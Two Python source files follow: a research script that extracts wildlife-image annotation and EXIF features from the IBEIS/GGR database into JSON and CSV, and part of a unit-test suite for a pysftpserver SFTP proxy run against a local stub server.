buildFeatureFl(input file,output file)
Reads from a csv file (taken as a parameter) containing a list of image GIDs.
Extracts the below features from the IBEIS dataset:
1. nid
2. names
3. species_texts
4. sex_texts
5. age_months_est
6. exemplar_flags
7. quality_texts
Outputs 3 files in the same directory as the outFL directory
File 1 : Map of all images and their annotation IDs (csv)
File 2 : Annotation ID's and their features (csv)
File 3 : Image GID, annotation ID's and their features (csv)
File 4 : Image GID, annotation ID's and their features (json)
'''
from __future__ import print_function
import GetPropertiesAPI as GP
import importlib, json, re, sys, csv, time, math
# importlib.reload(GP) # un-comment if there are any changes made to API
import pandas as pd
# import DataStructsHelperAPI as DS
from math import floor
# importlib.reload(GP)
from multiprocessing import Process
import DataStructsHelperAPI as DS
def printCompltnPercent(percentComplete):
i = int(percentComplete)
sys.stdout.write('\r')
# the exact output you're looking for:
sys.stdout.write("[%-100s] %d%%" % ('=' * i, i))
sys.stdout.flush()
def writeCsvFromDict(header, inDict, outFL):
writeFL = open(outFL, 'w')
writer = csv.writer(writeFL)
writer.writerow(header)
for key in inDict.keys():
if inDict[key] == None:
value = ["NONE"]
else:
value = inDict[key]
writer.writerow([key] + value)
writeFL.close()
def buildExifFeatureFl(inp, outFL, isInpFl=True):
if isInpFl:
with open(inp, "r") as inpFL:
gids = [row[0] for row in csv.reader(inpFL)]
else: # input is provided as a list
gids = inp
gids = list(map(lambda x: int(x), gids))
datetimes = GP.getExifData(gids, 'unixtime')
lats = GP.getExifData(gids, 'lat')
longs = GP.getExifData(gids, 'lon')
width = GP.getExifData(gids, 'width')
height = GP.getExifData(gids, 'height')
orientation = GP.getExifData(gids, 'orientation')
size = GP.getExifData(gids, 'size')
imgProps = {gids[i]: {'datetime': GP.getUnixTimeReadableFmt(datetimes[i]),
'lat': lats[i],
'long': longs[i],
'width': width[i],
'height': height[i],
'orientation': orientation[i],
'size': size[i]
}
for i in range(0, len(gids))}
with open(outFL, "w") as outFl:
json.dump(imgProps, outFl, indent=4)
return None
def buildBeautyFtrFl(inpFl, ftrs, outFlPrefix):
df = pd.DataFrame.from_csv(inpFl).transpose().reset_index()
df['index'] = df['index'].apply(lambda x: floor(float(x)))
df.columns = ftrs
df['GID'] = df['GID'].apply(lambda x: str(int(x)))
df.to_csv(str(outFlPrefix + ".csv"), index=False)
df.index = df['GID']
df.drop(['GID'], 1, inplace=True)
dctObj = df.to_dict(orient='index')
with open(str(outFlPrefix + ".json"), "w") as jsonObj:
json.dump(dctObj, jsonObj, indent=4)
return None
# Original Microsoft Tagging API output is a R list,
# This method parses the data into python readable form and dumps the output into a JSON.
def genJsonFromMSAIData(flName, outFlNm):
data = []
with open(flName) as openFl:
for row in openFl:
data.append(row)
cleanData = []
for row in data:
cleanData.append(row.replace("\\", "").replace('"\n', ""))
apiResultsDict = {}
for i in range(1, len(cleanData)):
key, value = cleanData[i].split("\t")
value = value.replace('"{"tags"', '{"tags"')
key = key.replace('"', '')
apiResultsDict[key] = json.loads(value)
json.dump(apiResultsDict, open(outFlNm, "w"), indent=4)
return None
def getAdditionalAnnotFeatures(gidAidMap, ftrName, outFlNm='/tmp/getAdditionalAnnotFeatures.dump.json'):
with open(gidAidMap, "r") as gidAidMapFl:
gidAidJson = json.load(gidAidMapFl)
additionalFtrDct = {}
gidInd = 0
n = len(gidAidJson.keys())
for gid in gidAidJson.keys():
additionalFtrDct[gid] = additionalFtrDct.get(gid, []) + [GP.getImageFeature(gidAidJson[gid][0], ftrName)][0]
gidInd += 1
percentComplete = gidInd * 100 / n
if math.floor(percentComplete) % 5 == 0:
printCompltnPercent(percentComplete)
with open(outFlNm, "w") as outFlObj:
json.dump(additionalFtrDct, outFlObj, indent=4)
return None
'''
Logic for reading data from the consolidatedHITResults file - changed
The input for the below method will be a csv file/list with all the image GID's for which the features have to be extracted.
'''
def buildFeatureFl(inp, outFL, isInpFl=True):
allGID = []
if isInpFl:
reader = csv.reader(open(inp, "r"))
for row in reader:
allGID.append(row)
else: # input is provided as a list
allGID = inp
# aids = GP.getAnnotID(allGID)
# Extracts all the annotation ID's from IBEIS
# GidAidMap = {allGID[i] : aids[i] for i in range(0,len(allGID))}
gidInd = 0
GidAidMap = {}
for gid in allGID:
aid = GP.getAnnotID(int(gid))
GidAidMap[gid] = [aid]
gidInd += 1
percentComplete = gidInd * 100 / len(allGID)
if math.floor(percentComplete) % 5 == 0:
printCompltnPercent(percentComplete)
print()
print("Extracted all annotation ID's for selected images.")
# filter out all the non-NONE annotation ids
aidList = []
for gid in GidAidMap.keys():
for aid in filter(lambda x: x != None, GidAidMap[gid]):
aidList = aidList + aid
# Extracts all feature info based on annotation ID's from IBEIS
features = {}
print("Features to be extracted for %d annotation IDs" % len(aidList))
nids = GP.getImageFeature(aidList, "name/rowid")
names = GP.getImageFeature(aidList, "name/text")
species_texts = GP.getImageFeature(aidList, "species/text")
sex_texts = GP.getImageFeature(aidList, "sex/text")
age_months = GP.getImageFeature(aidList, "age/months")
exemplar_flags = GP.getImageFeature(aidList, "exemplar")
quality_texts = GP.getImageFeature(aidList, "quality/text")
yaw_texts = GP.getImageFeature(aidList, "yaw/text")
image_contrib_tags = GP.getImageFeature(aidList, "image/contributor/tag")
features = {aidList[i]: {'nid': nids[i], "name": names[i], "species": species_texts[i], "sex": sex_texts[i],
'age': GP.getAgeFeatureReadableFmt(age_months[i]), 'exemplar': str(exemplar_flags[i]),
'quality': quality_texts[i], 'yaw': yaw_texts[i], 'contributor': image_contrib_tags[i]}
for i in range(0, len(aidList))}
print()
print("All features extracted.")
# Build the all combined file
GidAidFeatures = {}
for gid in GidAidMap.keys():
if GidAidMap[gid][0] == None:
GidAidFeatures[gid] = None
else:
GidAidFeatures[gid] = []
for aid in GidAidMap.get(gid)[0]:
newAidFeatures = {}
newAidFeatures[aid] = features[aid]
GidAidFeatures[gid].append(newAidFeatures)
writeFLTitle, writeFLExt = outFL.split('.csv')
writeFLExt = 'csv'
writeFLGidAidFl = writeFLTitle + "_gid_aid_map." + writeFLExt
writeFLAidFeatureFl = writeFLTitle + "_aid_features." + writeFLExt
writeFLGidAidFeatureFl = writeFLTitle + "_gid_aid_features." + writeFLExt
# Snippet for writing image GID - annotation ID map to a csv file
# head = ['GID','ANNOTATION_ID']
# writeCsvFromDict(head,GidAidMap,writeFLGidAidFl)
# head = ['ANNOTATION_ID','NID','NAME','SPECIES','SEX','AGE_MONTHS','EXEMPLAR_FLAG','IMAGE_QUALITY','IMAGE_YAW']
# writeCsvFromDict(head,features,writeFLAidFeatureFl)
# head = ['GID','ANNOTATION_ID','FEATURES']
# writeCsvFromDict(head,GidAidFeatures,writeFLGidAidFeatureFl)
outFL = open((writeFLTitle + "_gid_aid_map.json"), "w")
json.dump(GidAidMap, outFL, indent=4)
outFL.close()
outFL = open((writeFLTitle + "_aid_features.json"), "w")
json.dump(features, outFL, indent=4)
outFL.close()
outFL = open((writeFLTitle + "_gid_aid_features.json"), "w")
json.dump(GidAidFeatures, outFL, indent=4)
outFL.close()
print("Script completed.")
# these APIs require encoded annot_uuid_list
ggr_eco_ftr_api_map = {'age': "/api/annot/age/months/json",
'sex': "/api/annot/sex/text/json",
'bbox': "/api/annot/bbox/json",
'nid': "/api/annot/name/rowid/json",
'exemplar': "/api/annot/exemplar/json",
'species': "/api/annot/species/json",
'quality': "/api/annot/quality/text/json",
'view_point': "/api/annot/yaw/text/json"
}
# these APIs takes in an encoded gid list
ggr_otr_ftr_api_map = {'contributor': "/api/image/note",
'lat': "/api/image/lat",
'long': "/api/image/lon",
'datetime': "/api/image/unixtime",
'width': "/api/image/width",
'height': "/api/image/height",
'orientation': "/api/image/orientation"
}
def check_time_elapsed(start_time):
if time.time() - start_time >= 1.0:
return True
else:
return False
def build_feature_file_ggr(in_file, out_fl_head, start_count, end_count):
with open(in_file, "r") as in_fl:
img_uuids = list(json.load(in_fl).keys())
# img_uuids = [re.findall(r'(.*).jpg', uuid)[0] for uuid in img_uuids][start_count:end_count+1] # extract the filename without the extension
img_uuids = [uuid for uuid in img_uuids][start_count:end_count + 1]
print("Starting extract: %i to %i" % (start_count, end_count))
start_time = time.time()
uuid_annot_uuid_map = {}
for img_uuid in img_uuids:
uuid_dict = GP.ggr_get("/api/image/annot/uuid/json", GP.ggr_image_form_arg(img_uuid))
if len(uuid_dict['results'][0]) == 0: # case 1: has no annotation
uuid_annot_uuid_map[img_uuid] = [None]
else: # case 2, has 1 or more annot
for annot_dict in uuid_dict['results'][0]:
uuid_annot_uuid_map[img_uuid] = uuid_annot_uuid_map.get(img_uuid, []) + [annot_dict["__UUID__"]]
# elapsed time check
if check_time_elapsed(start_time):
start_time = time.time()
print("100 seconds elapsed..!")
print("Annotation UUIDs extracted")
# logic to flatten out the list of lists
aid_uuid_list = [item for sublist in list(uuid_annot_uuid_map.values()) for item in sublist if item]
start_time = time.time()
aid_uuid_feature_map = {}
for aid in aid_uuid_list:
species = GP.ggr_get(ggr_eco_ftr_api_map['species'], GP.ggr_annot_form_arg(aid))['results'][0]
sex = GP.ggr_get(ggr_eco_ftr_api_map['sex'], GP.ggr_annot_form_arg(aid))['results'][0]
age = GP.getAgeFeatureReadableFmt(
GP.ggr_get(ggr_eco_ftr_api_map['age'], GP.ggr_annot_form_arg(aid))['results'][0])
bbox = GP.ggr_get(ggr_eco_ftr_api_map['bbox'], GP.ggr_annot_form_arg(aid))['results'][0]
exemplar = GP.ggr_get(ggr_eco_ftr_api_map['exemplar'], GP.ggr_annot_form_arg(aid))['results'][0]
nid = GP.ggr_get(ggr_eco_ftr_api_map['nid'], GP.ggr_annot_form_arg(aid))['results'][0]
quality = GP.ggr_get(ggr_eco_ftr_api_map['quality'], GP.ggr_annot_form_arg(aid))['results'][0]
view_point = GP.ggr_get(ggr_eco_ftr_api_map['view_point'], GP.ggr_annot_form_arg(aid))['results'][0]
aid_uuid_feature_map[aid] = dict(sex=sex, age=age, bbox=bbox, exemplar=exemplar, nid=nid, species=species,
view_point=view_point, quality=quality)
if check_time_elapsed(start_time):
start_time = time.time()
print("100 seconds elapsed..!")
print("Feature extraction completed..!")
uuid_annot_uuid_map_fl_nm = out_fl_head + "_uuid_annot_uuid_map.json"
with open(uuid_annot_uuid_map_fl_nm, "w") as uuid_annot_uuid_map_fl:
json.dump(uuid_annot_uuid_map, uuid_annot_uuid_map_fl, indent=4)
annot_uuid_ftr_map_fl_nm = out_fl_head + "_annot_uuid_ftr_map.json"
with open(annot_uuid_ftr_map_fl_nm, "w") as annot_uuid_ftr_map_fl:
json.dump(aid_uuid_feature_map, annot_uuid_ftr_map_fl, indent=4)
return 0
def build_exif_ftrs_fl_ggr(in_file_uuid_gid_map, in_file_uuid_list, out_fl, start, end):
with open(in_file_uuid_gid_map, "r") as in_map_fl:
uuid_gid_map = json.load(in_map_fl)
with open(in_file_uuid_list, "r") as in_list_fl:
uuid_list = in_list_fl.read().split("\n")[start:end + 1]
start_time = time.time()
gid_uuid_exif_ftr_map = {}
for uuid in uuid_list:
gid = uuid_gid_map[uuid]
lat = GP.ggr_get(ggr_otr_ftr_api_map['lat'], GP.ggr_gid_form_arg(gid))['results'][0]
long = GP.ggr_get(ggr_otr_ftr_api_map['long'], GP.ggr_gid_form_arg(gid))['results'][0]
datetime = GP.getUnixTimeReadableFmt(
GP.ggr_get(ggr_otr_ftr_api_map['datetime'], GP.ggr_gid_form_arg(gid))['results'][0])
contributor = GP.ggr_get(ggr_otr_ftr_api_map['contributor'], GP.ggr_gid_form_arg(gid))['results'][0]
height = GP.ggr_get(ggr_otr_ftr_api_map['height'], GP.ggr_gid_form_arg(gid))['results'][0]
width = GP.ggr_get(ggr_otr_ftr_api_map['width'], GP.ggr_gid_form_arg(gid))['results'][0]
orientation = GP.ggr_get(ggr_otr_ftr_api_map['orientation'], GP.ggr_gid_form_arg(gid))['results'][0]
gid_uuid_exif_ftr_map[uuid] = dict(lat=lat, long=long, datetime=datetime, contributor=contributor,
height=height, width=width, orientation=orientation)
if check_time_elapsed(start_time):
start_time = time.time()
print("100 seconds elapsed..!")
with open(out_fl, "w") as uuid_exif_ftr_fl:
json.dump(gid_uuid_exif_ftr_map, uuid_exif_ftr_fl, indent=4)
return 0
def build_reqd_ftrs():
return 0
def __main__():
allGidPart1 = list(map(str, list(range(1, 5000))))
print("Starting feature extraction for GIDs . . .Part1")
buildFeatureFl(allGidPart1, "../data/full1.csv", False)
print("Completed feature extraction . . .Part1")
print("Starting EXIF feature extraction for GIDs . . .Part1")
buildExifFeatureFl(allGidPart1, "../data/imgs_exif_data_full1.json", False)
print("Completed EXIF feature extraction . . .Part1")
allGidPart2 = list(map(str, list(range(5000, 9407))))
print("Starting feature extraction for GIDs . . .Part2")
buildFeatureFl(allGidPart2, "../data/full2.csv", False)
print("Completed feature extraction . . .Part2")
print("Starting EXIF feature extraction for GIDs . . .Part2")
buildExifFeatureFl(allGidPart2, "../data/imgs_exif_data_full2.json", False)
print("Completed EXIF feature extraction . . .Part2")
print("Combining part files to full files")
DS.combineJson("../data/full1_gid_aid_map.json", "../data/full2_gid_aid_map.json", "../data/full_gid_aid_map.json")
DS.combineJson("../data/full1_gid_aid_features.json", "../data/full2_gid_aid_features.json",
"../data/full_gid_aid_features.json")
DS.combineJson("../data/full1_aid_features.json", "../data/full2_aid_features.json",
"../data/full_aid_features.json")
DS.combineJson("../data/imgs_exif_data_full1.json", "../data/imgs_exif_data_full2.json",
"../data/imgs_exif_data_full.json")
def test(start, end, out):
inExifFl, inGidAidMapFl, inAidFtrFl = "../data/ggr_gid_uuid_exif_ftr_map.json", "../data/ggr_uuid_annot_uuid_map.json", "../data/ggr_annot_uuid_ftr_map.json"
with open(inGidAidMapFl, "r") as fl:
obj = json.load(fl)
with open(inAidFtrFl, "r") as fl:
obj2 = json.load(fl)
no_ftr_annots = []
for uuid in obj:
if obj[uuid][0] != None: # there is atleast one aid
for annot_id in obj[uuid]:
# check if annot_id in ftr file
if annot_id not in obj2.keys():
no_ftr_annots.append(annot_id)
print(len(no_ftr_annots))
aid_uuid_feature_map = {}
for aid in no_ftr_annots[start:end]:
species = GP.ggr_get(ggr_eco_ftr_api_map['species'], GP.ggr_annot_form_arg(aid))['results'][0]
sex = GP.ggr_get(ggr_eco_ftr_api_map['sex'], GP.ggr_annot_form_arg(aid))['results'][0]
age = GP.getAgeFeatureReadableFmt(
GP.ggr_get(ggr_eco_ftr_api_map['age'], GP.ggr_annot_form_arg(aid))['results'][0])
bbox = GP.ggr_get(ggr_eco_ftr_api_map['bbox'], GP.ggr_annot_form_arg(aid))['results'][0]
exemplar = GP.ggr_get(ggr_eco_ftr_api_map['exemplar'], GP.ggr_annot_form_arg(aid))['results'][0]
nid = GP.ggr_get(ggr_eco_ftr_api_map['nid'], GP.ggr_annot_form_arg(aid))['results'][0]
quality = GP.ggr_get(ggr_eco_ftr_api_map['quality'], GP.ggr_annot_form_arg(aid))['results'][0]
view_point = GP.ggr_get(ggr_eco_ftr_api_map['view_point'], GP.ggr_annot_form_arg(aid))['results'][0]
aid_uuid_feature_map[aid] = dict(sex=sex, age=age, bbox=bbox, exemplar=exemplar, nid=nid, species=species,
view_point=view_point, quality=quality)
with open(out, "w") as fl:
json.dump(aid_uuid_feature_map, fl, indent=4)
if __name__ == "__main__":
gids = list(map(str, list(range(1, 1862))))
buildFeatureFl(gids, "../data/Flickr_IBEIS_Giraffe_Ftrs.csv", False)
# __main__()
# gidAidMapFl = "../data/full_gid_aid_map.json"
# getAdditionalAnnotFeatures(gidAidMapFl,'bbox',"../data/gid_bbox.json")
# buildBeautyFtrFl("../data/beautyFeatures_GZC_R.csv",['GID','pleasure','arousal','dominance','y'],"../data/beautyFeatures_GZC")
# DS.combineJson("../data/beautyFeatures_GZC.json","../data/imgs_exif_data_full.json","../data/GZC_exifs_beauty_full.json")
# p1 = Process(target=build_exif_ftrs_fl_ggr, args=("uuid_gid_map.json", "ggr_uuid_list.dat", "ggr_exif_extract_1.json",1,5000))
# p2 = Process(target=build_exif_ftrs_fl_ggr, args=("uuid_gid_map.json", "ggr_uuid_list.dat", "ggr_exif_extract_2.json",5001,10000))
# p3 = Process(target=build_exif_ftrs_fl_ggr, args=("uuid_gid_map.json", "ggr_uuid_list.dat", "ggr_exif_extract_3.json",10001,15000))
# p4 = Process(target=build_exif_ftrs_fl_ggr, args=("uuid_gid_map.json", "ggr_uuid_list.dat", "ggr_exif_extract_4.json",15001,20000))
# p5 = Process(target=build_exif_ftrs_fl_ggr, args=("uuid_gid_map.json", "ggr_uuid_list.dat", "ggr_exif_extract_5.json",20001,25000))
# p6 = Process(target=build_exif_ftrs_fl_ggr, args=("uuid_gid_map.json", "ggr_uuid_list.dat", "ggr_exif_extract_6.json",25001,30000))
# p7 = Process(target=build_exif_ftrs_fl_ggr, args=("uuid_gid_map.json", "ggr_uuid_list.dat", "ggr_exif_extract_7.json",30001,35000))
# p8 = Process(target=build_exif_ftrs_fl_ggr, args=("uuid_gid_map.json", "ggr_uuid_list.dat", "ggr_exif_extract_8.json",35001,37433))
# p9 = Process(target=build_feature_file_ggr, args=("uuid_gid_map.json", "ggr_ftr_extract_1",1,5000))
# p10 = Process(target=build_feature_file_ggr, args=("uuid_gid_map.json", "ggr_ftr_extract_2",5001,10000))
# p11 = Process(target=build_feature_file_ggr, args=("uuid_gid_map.json", "ggr_ftr_extract_3",10001,15000))
# p12 = Process(target=build_feature_file_ggr, args=("uuid_gid_map.json", "ggr_ftr_extract_4",15001,20000))
# p13 = Process(target=build_feature_file_ggr, args=("uuid_gid_map.json", "ggr_ftr_extract_5",20001,25000))
# p14 = Process(target=build_feature_file_ggr, args=("uuid_gid_map.json", "ggr_ftr_extract_6",25001,30000))
# p15 = Process(target=build_feature_file_ggr, args=("uuid_gid_map.json", "ggr_ftr_extract_7",30001,35000))
# p16 = Process(target=build_feature_file_ggr, args=("uuid_gid_map.json", "ggr_ftr_extract_8",35001,37433))
# p1 = Process(target=test, args=(0, 400, "/tmp/test1.json"))
# p2 = Process(target=test, args=(400, 800, "/tmp/test2.json"))
# p3 = Process(target=test, args=(800, 1200, "/tmp/test3.json"))
# p4 = Process(target=test, args=(1200, 1600, "/tmp/test4.json"))
# p5 = Process(target=test, args=(1600, 2000, "/tmp/test5.json"))
# p6 = Process(target=test, args=(2000, 2400, "/tmp/test6.json"))
# p7 = Process(target=test, args=(2400, 2800, "/tmp/test7.json"))
# p8 = Process(target=test, args=(2800, 3200, "/tmp/test8.json"))
# p9 = Process(target=test, args=(3200, 3600, "/tmp/test9.json"))
# p10 = Process(target=test, args=(3600, 4033, "/tmp/test10.json"))
# p1.start()
# p2.start()
# p3.start()
# p4.start()
# p5.start()
# p6.start()
# p7.start()
# p8.start()
# p9.start()
# p10.start()
# # p11.start()
# # p12.start()
# # p13.start()
# # p14.start()
# # p15.start()
# # p16.start()
|
test_server_proxy.py
|
#!/usr/bin/env python
# encoding: utf-8
from __future__ import print_function
import threading
import logging
import socket
import select
import paramiko
import os
import unittest
import stat
from shutil import rmtree
from pysftpserver.tests.stub_sftp import StubServer, StubSFTPServer
from pysftpserver.tests.utils import *
from pysftpserver.server import *
from pysftpserver.proxystorage import SFTPServerProxyStorage
REMOTE_ROOT = t_path("server_root")
LOCAL_ROOT = t_path("local_folder")
remote_file = lambda file_path: os.path.join(REMOTE_ROOT, file_path)
event = threading.Event()
# attach existing loggers (use --nologcapture option to see output)
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s - %(levelname)s - %(message)s'
)
def _start_sftp_server():
"""Start the SFTP local server."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setblocking(0)
sock.bind(('localhost', 2223))
sock.listen(10)
reads = {sock}
others = set()
while not event.is_set():
ready_to_read, _, _ = \
select.select(
reads,
others,
others,
1)
if sock in ready_to_read:
client_socket, address = sock.accept()
ts = paramiko.Transport(client_socket)
host_key = paramiko.RSAKey.from_private_key_file(
t_path('server_id_rsa')
)
ts.add_server_key(host_key)
server = StubServer()
ts.set_subsystem_handler(
'sftp', paramiko.SFTPServer, StubSFTPServer)
ts.start_server(server=server)
sock.close()
def setup_module():
"""Setup in a new thread the SFTP local server."""
os.chdir(t_path())
os.mkdir(REMOTE_ROOT)
t = threading.Thread(target=_start_sftp_server, name="server")
t.start()
def teardown_module():
"""Stop the SFTP server by setting its event.
Clean remaining directories (in case of failures).
"""
event.set()
rmtree(REMOTE_ROOT, ignore_errors=True)
class TestProxyServer(unittest.TestCase):
@classmethod
def setup_class(cls):
os.mkdir(LOCAL_ROOT)
os.chdir(LOCAL_ROOT)
def setUp(self):
"""Before running each test, create a server instance and create the required directories."""
self.server = SFTPServer(
SFTPServerProxyStorage(
"test:secret@localhost",
port=2223
),
logfile=t_path('log'),
raise_on_error=True
)
def test_mkdir(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_MKDIR, sftpstring(b'foo'), sftpint(0))
self.server.process()
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_MKDIR, sftpstring(b'foo'), sftpint(0))
self.assertRaises(SFTPException, self.server.process)
self.assertTrue(os.path.exists(remote_file("foo")) and os.path.isdir(remote_file("foo")))
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_RMDIR, sftpstring(b'foo')
)
self.server.process()
self.assertFalse(os.path.exists(remote_file("foo")))
def test_stat(self):
with open("/etc/services") as f:
with open(remote_file("services"), 'a') as f_bis:
f_bis.write(f.read())
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_STAT,
sftpstring(b'services')
)
self.server.process()
stat = get_sftpstat(self.server.output_queue)
self.assertEqual(stat['size'], os.path.getsize("/etc/services"))
self.assertEqual(stat['uid'], os.getuid())
os.unlink(remote_file("services"))
def test_lstat(self):
os.symlink("foo", remote_file("link"))
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_LSTAT,
sftpstring(b'link')
)
self.server.process()
stat = get_sftpstat(self.server.output_queue)
self.assertEqual(stat['size'], len("foo"))
self.assertEqual(stat['uid'], os.getuid())
os.unlink(remote_file("link"))
def test_fstat(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_OPEN,
sftpstring(b'services'),
sftpint(SSH2_FXF_READ | SSH2_FXF_WRITE | SSH2_FXF_CREAT),
sftpint(0)
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_FSTAT,
sftpstring(handle)
)
self.server.process()
stat = get_sftpstat(self.server.output_queue)
self.assertEqual(stat['size'], 0)
self.assertEqual(stat['uid'], os.getuid())
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle)
)
self.server.process()
os.unlink(remote_file("services"))
def test_setstat(self):
atime = 1415626110
mtime = 1415626120
size = 10 ** 2
self.server.input_queue = sftpcmd(
SSH2_FXP_OPEN,
sftpstring(b'services'),
sftpint(SSH2_FXF_CREAT | SSH2_FXF_WRITE | SSH2_FXP_READ),
sftpint(0)
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
# reset output queue
self.server.output_queue = b''
etc_services = open('/etc/services', 'rb').read()
self.server.input_queue = sftpcmd(
SSH2_FXP_WRITE,
sftpstring(handle),
sftpint64(0),
sftpstring(etc_services)
)
self.server.process()
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_SETSTAT,
sftpstring(b'services'),
sftpint(
SSH2_FILEXFER_ATTR_SIZE |
SSH2_FILEXFER_ATTR_PERMISSIONS |
SSH2_FILEXFER_ATTR_ACMODTIME
),
sftpint64(size), # 100 bytes
sftpint(33152), # 0o100600
sftpint(atime),
sftpint(mtime)
)
self.server.process()
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle)
)
self.server.process()
self.assertEqual(
0o600,
stat.S_IMODE(os.lstat(remote_file('services')).st_mode))
self.assertEqual(
atime,
os.lstat(remote_file('services')).st_atime)
self.assertEqual(
mtime,
os.lstat(remote_file('services')).st_mtime)
self.assertEqual(
size,
os.lstat(remote_file('services')).st_size)
os.unlink(remote_file('services'))
def test_fsetstat(self):
atime = 1415626110
mtime = 1415626120
size = 10 ** 2
self.server.input_queue = sftpcmd(
SSH2_FXP_OPEN,
sftpstring(b'services'),
sftpint(SSH2_FXF_CREAT | SSH2_FXF_WRITE),
sftpint(0)
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
# reset output queue
self.server.output_queue = b''
etc_services = open('/etc/services', 'rb').read()
self.server.input_queue = sftpcmd(
SSH2_FXP_WRITE,
sftpstring(handle),
sftpint64(0),
sftpstring(etc_services)
)
self.server.process()
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_FSETSTAT,
sftpstring(handle),
sftpint(
SSH2_FILEXFER_ATTR_SIZE |
SSH2_FILEXFER_ATTR_PERMISSIONS |
SSH2_FILEXFER_ATTR_ACMODTIME
),
sftpint64(size), # 1000 bytes
sftpint(33152), # 0o100600
sftpint(atime),
sftpint(mtime)
)
self.server.process()
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle)
)
self.server.process()
self.assertEqual(
0o600,
stat.S_IMODE(os.lstat(remote_file('services')).st_mode)
)
self.assertEqual(
atime,
os.lstat(remote_file('services')).st_atime
)
self.assertEqual(
mtime,
os.lstat(remote_file('services')).st_mtime
)
self.assertEqual(
size,
os.lstat(remote_file('services')).st_size
)
os.unlink(remote_file('services'))
def test_read_subdir(self):
f = {b'.', b'..', b'bar'} # files inside foo
os.mkdir(remote_file("foo"))
foobar_path = os.path.join(remote_file("foo"), "bar")
with open(foobar_path, 'a') as stream:
print("foobar", file=stream)
# bar_size = os.lstat(foobar_path).st_size
self.server.input_queue = sftpcmd(
SSH2_FXP_OPENDIR,
sftpstring(b'foo')
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
l = set()
while (True):
# reset output queue
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_READDIR,
sftpstring(handle),
)
try:
self.server.process()
filename = get_sftpname(self.server.output_queue)
l.add(filename)
except:
break
self.assertEqual(l, f)
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle),
)
self.server.process()
rmtree(remote_file("foo"))
def test_open_not_found(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_OPEN,
sftpstring(b'services'),
sftpint(SSH2_FXF_READ),
sftpint(0),
)
self.assertRaises(SFTPNotFound, self.server.process)
def test_remove(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_OPEN,
sftpstring(b'services'),
sftpint(SSH2_FXF_CREAT | SSH2_FXF_WRITE),
sftpint(SSH2_FILEXFER_ATTR_PERMISSIONS),
sftpint(0o644)
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
# reset output queue
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle)
)
self.server.process()
self.server.input_queue = sftpcmd(
SSH2_FXP_REMOVE,
sftpstring(b'services'),
sftpint(0)
)
self.server.process()
def test_rename(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_OPEN,
sftpstring(b'services'),
sftpint(SSH2_FXF_CREAT | SSH2_FXF_WRITE),
sftpint(SSH2_FILEXFER_ATTR_PERMISSIONS),
sftpint(0o644)
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
# reset output queue
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle),
)
self.server.process()
self.server.input_queue = sftpcmd(
SSH2_FXP_RENAME,
sftpstring(b'services'),
sftpstring(b'other_services'),
)
self.server.process()
self.assertIn('other_services', os.listdir(REMOTE_ROOT))
os.unlink(remote_file('other_services'))
def test_remove_notfound(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_REMOVE,
sftpstring(b'services'),
sftpint(0)
)
self.assertRaises(SFTPNotFound, self.server.process)
def test_mkdir_notfound(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_MKDIR, sftpstring(b'bad/ugly'), sftpint(0))
self.assertRaises(SFTPNotFound, self.server.process)
def test_readdir(self):
f = {b'.', b'..', b'foo', b'bar'}
os.mkdir(remote_file("foo"))
os.close(os.open(remote_file("bar"), os.O_CREAT))
self.server.input_queue = sftpcmd(
SSH2_FXP_OPENDIR,
sftpstring(b'.')
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
l = set()
while (True):
# reset output queue
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_READDIR,
sftpstring(handle),
)
try:
self.server.process()
filename = get_sftpname(self.server.output_queue)
l.add(filename)
except:
break
self.assertEqual(l, f)
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle),
)
self.server.process()
os.unlink(remote_file("bar"))
os.rmdir(remote_file("foo"))
def test_symlink(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_SYMLINK, sftpstring(b'bad/ugly'), sftpstring(b'bad/ugliest'), sftpint(0))
self.assertRaises(SFTPNotFound, self.server.process)
self.server.input_queue = sftpcmd(
SSH2_FXP_SYMLINK, sftpstring(b'ugly'), sftpstring(b'ugliest'), sftpint(0))
self.server.process()
self.assertIn('ugly', os.listdir(REMOTE_ROOT))
def test_readlink(self):
os.symlink("infound", remote_file("foo"))
self.server.input_queue = sftpcmd(
SSH2_FXP_READLINK, sftpstring(b'foo'), sftpint(0))
self.server.process()
link = get_sftpname(self.server.output_queue)
self.assertEqual(link, b"infound")
def test_readdir_broken_symlink(self):
